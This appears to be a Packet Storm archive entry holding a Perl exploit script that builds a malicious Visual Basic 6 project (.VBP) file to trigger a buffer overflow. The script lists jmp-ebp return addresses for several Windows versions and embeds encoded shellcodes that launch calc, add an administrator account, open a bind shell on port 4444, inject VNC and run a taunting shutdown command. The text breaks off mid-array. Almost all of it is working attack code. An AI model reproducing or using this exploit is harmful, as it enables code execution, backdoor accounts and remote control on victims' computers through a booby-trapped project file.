Search...

msvb-codeexec.txt

2007-09-05T00:00:00

ID PACKETSTORM:59048
Type packetstorm
Reporter koshi
Modified 2007-09-05T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++  
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++  
#'++ Author: Koshi +  
#'++ Email: heykoshi at gmail dot com +  
#'++ Application: Microsoft Visual Basic 6.0 +  
#'++ +  
#'++ Tested on Microsoft Windows XP Home Edition SP2 +  
#'++ Patched & Updated +  
#'++ +  
#'++ The vulnerable buffer exsists in the .VBP files of +  
#'++ Visual Basic projects. You can jump directly to +  
#'++ the shellcode, or jump to it via EBP. +  
#'++ +  
#'++ There is NO restriction of shellcode size either. +  
#'++ +  
#'++ Gr33tz: Rima my baby who I love and adore, Draven +  
#'++ for pointing me in the right direction, as always. +  
#'++ +  
#'++ +  
#'++ This exploit is for educational use only, blah. +  
#'++ +  
#'++ +  
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++  
#  
# Ex. of Usage:  
# perl vb6.pl 1 &gt;&gt;Project.vbp  
#   
#  
$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D".  
"\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A";  
  
$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D".  
"\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30".  
"\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D".  
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23".  
"\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E".  
"\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53".  
"\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F".  
"\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75".  
"\x74\x6F\x6D\x61\x74\x69\x6F\x6E";  
  
$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A".  
"\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22";  
  
$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41";  
  
$codeAddr = "\x83\x25\x40\x01";  
# You can most likely use a call or a push, you could probably use them from kernel32.dll too.  
#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example.  
# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)  
# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)  
# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)  
# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)  
# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)  
# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)  
#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)  
# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)  
# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)  
# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)  
# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions  
# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)  
# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)  
# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions  
# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions  
# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions  
# ...backwards..if you don't know why, then gtfo.  
$jmpEbp = "\xA3\x3D\x92\x7C";  
$fourSkin = "\x44\x44\x44\x44";  
  
  
$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".  
"\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".  
"\x41\x41\x41\x41\x41\x41\x41\x41";  
  
$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D".  
"\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65".  
"\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F".  
"\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72".  
"\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30".  
"\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74".  
"\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65".  
"\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77".  
"\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D".  
"\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C".  
"\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D".  
"\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65".  
"\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74".  
"\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68".  
"\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62".  
"\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61".  
"\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65".  
"\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A";  
  
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com  
$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".   
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".  
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47".  
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38".  
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".  
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".  
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".  
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44".  
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".  
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".  
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47".  
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a".  
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".  
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33".  
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".  
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59".  
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".  
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a";  
  
# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com  
$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".  
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37".  
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58".  
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".  
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".  
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48".  
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54".  
"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58".  
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".  
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37".  
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".  
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".  
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53".  
"\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".  
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59".  
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46".  
"\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46".  
"\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36".  
"\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32".  
"\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34".  
"\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46".  
"\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56".  
"\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56".  
"\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57".  
"\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36".  
"\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a";  
  
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com  
$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".  
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".  
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37".  
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58".  
"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".  
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".  
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48".  
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".  
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58".  
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d".  
"\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48".  
"\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46".  
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46".  
"\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37".  
"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".  
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".  
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50".  
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".  
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54".  
"\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31".  
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a".  
"\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31".  
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".  
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".  
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d".  
"\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36".  
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".  
"\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46".  
"\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c".  
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c".  
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42".  
"\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".  
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".  
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46".  
"\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36".  
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".  
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".  
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".  
"\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d".  
"\x4f\x4f\x42\x4d\x5a";  
  
# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com  
$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".  
"\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".  
"\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".  
"\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".  
"\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".  
"\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".  
"\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".  
"\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".  
"\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".  
"\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".  
"\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".  
"\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".  
"\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".  
"\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".  
"\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".  
"\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".  
"\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".  
"\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".  
"\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".  
"\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".  
"\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".  
"\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".  
"\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".  
"\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".  
"\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".  
"\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".  
"\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".  
"\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".  
"\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".  
"\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".  
"\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".  
"\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".  
"\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".  
"\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".  
"\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".  
"\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".  
"\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";  
  
# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com  
$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".  
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47".  
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48".  
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48".  
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".  
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38".  
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34".  
"\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".  
"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43".  
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37".  
"\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a".  
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b".  
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53".  
"\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37".  
"\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39".  
